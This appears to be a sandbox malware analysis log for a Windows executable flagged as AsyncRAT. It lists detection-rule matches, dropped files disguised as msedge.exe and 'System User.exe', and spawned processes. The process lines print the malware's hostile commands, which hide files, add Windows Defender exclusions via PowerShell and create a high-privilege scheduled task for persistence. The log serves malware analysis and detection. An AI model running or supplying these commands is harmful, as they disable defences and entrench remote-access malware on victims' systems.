                      Source: YgJ5inWPQO.exe, 00000002.00000003.1477753556.000001D8A9689000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe4 vs YgJ5inWPQO.exe
                      Source: YgJ5inWPQO.exe, 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs YgJ5inWPQO.exe
                      Source: YgJ5inWPQO.exe, 00000002.00000003.1486802746.000001D8A968D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe4 vs YgJ5inWPQO.exe
                      Source: YgJ5inWPQO.exe, 00000002.00000002.1497896040.000001D8A98E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSolaraBootstrapper.exeF vs YgJ5inWPQO.exe
                      Source: YgJ5inWPQO.exe, 00000002.00000003.1486429771.000001D8A9688000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe4 vs YgJ5inWPQO.exe
                      Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 2.3.YgJ5inWPQO.exe.1d8a96bd23f.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 2.2.YgJ5inWPQO.exe.1d8a969d430.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 2.2.YgJ5inWPQO.exe.1d8a969d430.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 12.0.msedge.exe.3d0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 2.3.YgJ5inWPQO.exe.1d8a96bd23f.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 00000002.00000003.1479245702.000001D8A966B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 00000002.00000003.1485033909.000001D8A9686000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 00000002.00000003.1477560662.000001D8A96BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 0000000C.00000000.1480505898.00000000003D2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 00000002.00000002.1495329200.000001D8A969D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 00000002.00000003.1477753556.000001D8A9689000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 00000002.00000003.1486802746.000001D8A968D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 00000002.00000003.1486429771.000001D8A9688000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: C:\Users\user\AppData\Roaming\System User.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: msedge.exe.2.dr, 3dgQ4sLORTEz8Prkm60ulWACIXjwJ7c6mrCcGNf2MvuZdnTw9FZ0qRPg2U86pBEnH.csCryptographic APIs: 'TransformFinalBlock'
                      Source: msedge.exe.2.dr, 3dgQ4sLORTEz8Prkm60ulWACIXjwJ7c6mrCcGNf2MvuZdnTw9FZ0qRPg2U86pBEnH.csCryptographic APIs: 'TransformFinalBlock'
                      Source: msedge.exe.2.dr, 0z3ZIhpJfhq2njFq0TTjg8sopVsEWVPb24mSwU4g0QL4dxjF7JdE4QOgJ40VPuiaU.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.6.raw.unpack, 3dgQ4sLORTEz8Prkm60ulWACIXjwJ7c6mrCcGNf2MvuZdnTw9FZ0qRPg2U86pBEnH.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.6.raw.unpack, 3dgQ4sLORTEz8Prkm60ulWACIXjwJ7c6mrCcGNf2MvuZdnTw9FZ0qRPg2U86pBEnH.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.6.raw.unpack, 0z3ZIhpJfhq2njFq0TTjg8sopVsEWVPb24mSwU4g0QL4dxjF7JdE4QOgJ40VPuiaU.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 2.2.YgJ5inWPQO.exe.1d8a969d430.0.raw.unpack, 3dgQ4sLORTEz8Prkm60ulWACIXjwJ7c6mrCcGNf2MvuZdnTw9FZ0qRPg2U86pBEnH.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 2.2.YgJ5inWPQO.exe.1d8a969d430.0.raw.unpack, 3dgQ4sLORTEz8Prkm60ulWACIXjwJ7c6mrCcGNf2MvuZdnTw9FZ0qRPg2U86pBEnH.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 2.2.YgJ5inWPQO.exe.1d8a969d430.0.raw.unpack, 0z3ZIhpJfhq2njFq0TTjg8sopVsEWVPb24mSwU4g0QL4dxjF7JdE4QOgJ40VPuiaU.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 2.3.YgJ5inWPQO.exe.1d8a96bd23f.0.raw.unpack, 3dgQ4sLORTEz8Prkm60ulWACIXjwJ7c6mrCcGNf2MvuZdnTw9FZ0qRPg2U86pBEnH.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 2.3.YgJ5inWPQO.exe.1d8a96bd23f.0.raw.unpack, 3dgQ4sLORTEz8Prkm60ulWACIXjwJ7c6mrCcGNf2MvuZdnTw9FZ0qRPg2U86pBEnH.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.5.raw.unpack, stk6so8iK7FJeV1oDN5jkaRBY7Ddrzd4rBzBn9cyxVQm0hI4XGecZHjMpsFUIQ2opBbgNNP4Er2RJQfs.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.5.raw.unpack, stk6so8iK7FJeV1oDN5jkaRBY7Ddrzd4rBzBn9cyxVQm0hI4XGecZHjMpsFUIQ2opBbgNNP4Er2RJQfs.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 2.3.YgJ5inWPQO.exe.1d8a96bd23f.0.raw.unpack, stk6so8iK7FJeV1oDN5jkaRBY7Ddrzd4rBzBn9cyxVQm0hI4XGecZHjMpsFUIQ2opBbgNNP4Er2RJQfs.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 2.3.YgJ5inWPQO.exe.1d8a96bd23f.0.raw.unpack, stk6so8iK7FJeV1oDN5jkaRBY7Ddrzd4rBzBn9cyxVQm0hI4XGecZHjMpsFUIQ2opBbgNNP4Er2RJQfs.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: msedge.exe.2.dr, stk6so8iK7FJeV1oDN5jkaRBY7Ddrzd4rBzBn9cyxVQm0hI4XGecZHjMpsFUIQ2opBbgNNP4Er2RJQfs.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: msedge.exe.2.dr, stk6so8iK7FJeV1oDN5jkaRBY7Ddrzd4rBzBn9cyxVQm0hI4XGecZHjMpsFUIQ2opBbgNNP4Er2RJQfs.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 2.2.YgJ5inWPQO.exe.1d8a969d430.0.raw.unpack, stk6so8iK7FJeV1oDN5jkaRBY7Ddrzd4rBzBn9cyxVQm0hI4XGecZHjMpsFUIQ2opBbgNNP4Er2RJQfs.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 2.2.YgJ5inWPQO.exe.1d8a969d430.0.raw.unpack, stk6so8iK7FJeV1oDN5jkaRBY7Ddrzd4rBzBn9cyxVQm0hI4XGecZHjMpsFUIQ2opBbgNNP4Er2RJQfs.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.6.raw.unpack, stk6so8iK7FJeV1oDN5jkaRBY7Ddrzd4rBzBn9cyxVQm0hI4XGecZHjMpsFUIQ2opBbgNNP4Er2RJQfs.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.6.raw.unpack, stk6so8iK7FJeV1oDN5jkaRBY7Ddrzd4rBzBn9cyxVQm0hI4XGecZHjMpsFUIQ2opBbgNNP4Er2RJQfs.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: YgJ5inWPQO.exe, 00000002.00000002.1493989568.000001D8A78AC000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1492997781.000001D8A78AA000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1487831431.000001D8A78A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBp@Y@.
                      Source: classification engineClassification label: mal100.troj.evad.winEXE@49/42@6/6
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeFile created: C:\Users\user\AppData\Roaming\System User.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\System User.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4040:120:WilError_03
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeMutant created: \Sessions\1\BaseNamedObjects\xAXRhxSiuCvWXlAf
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7800:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4676:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4940:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6600:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2888:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6828:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3848:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7296:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7532:120:WilError_03
                      Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6476
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4536:120:WilError_03
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI4322Jump to behavior
                      Source: YgJ5inWPQO.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: YgJ5inWPQO.exeReversingLabs: Detection: 26%
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeFile read: C:\Users\user\Desktop\YgJ5inWPQO.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\YgJ5inWPQO.exe "C:\Users\user\Desktop\YgJ5inWPQO.exe"
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeProcess created: C:\Users\user\Desktop\YgJ5inWPQO.exe "C:\Users\user\Desktop\YgJ5inWPQO.exe"
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h C:\Users\user\AppData\Local\Temp\msedge.exe"
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h C:\Users\user\AppData\Local\Temp\dddd.exe"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "START C:\Users\user\AppData\Local\Temp\msedge.exe"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "START C:\Users\user\AppData\Local\Temp\dddd.exe"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h C:\Users\user\AppData\Local\Temp\dddd.exe
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\msedge.exe C:\Users\user\AppData\Local\Temp\msedge.exe
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h C:\Users\user\AppData\Local\Temp\msedge.exe
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\dddd.exe C:\Users\user\AppData\Local\Temp\dddd.exe
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c ipconfig /all
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /all
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msedge.exe'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6476 -s 2224
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\System User.exe'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System User.exe'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System User" /tr "C:\Users\user\AppData\Roaming\System User.exe"
                      Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\System User.exe "C:\Users\user\AppData\Roaming\System User.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\System User.exe "C:\Users\user\AppData\Roaming\System User.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\System User.exe "C:\Users\user\AppData\Roaming\System User.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\System User.exe "C:\Users\user\AppData\Roaming\System User.exe"
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeProcess created: C:\Users\user\Desktop\YgJ5inWPQO.exe "C:\Users\user\Desktop\YgJ5inWPQO.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h C:\Users\user\AppData\Local\Temp\msedge.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h C:\Users\user\AppData\Local\Temp\dddd.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "START C:\Users\user\AppData\Local\Temp\msedge.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "START C:\Users\user\AppData\Local\Temp\dddd.exe"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h C:\Users\user\AppData\Local\Temp\msedge.exeJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h C:\Users\user\AppData\Local\Temp\dddd.exeJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\msedge.exe C:\Users\user\AppData\Local\Temp\msedge.exeJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\dddd.exe C:\Users\user\AppData\Local\Temp\dddd.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msedge.exe'Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\System User.exe'Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System User.exe'Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System User" /tr "C:\Users\user\AppData\Roaming\System User.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c ipconfig /allJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /allJump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeSection loaded: vcruntime140.dllJump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeSection loaded: python3.dllJump to behavior
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
                      Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeSection loaded: mpr.dllJump to behavior
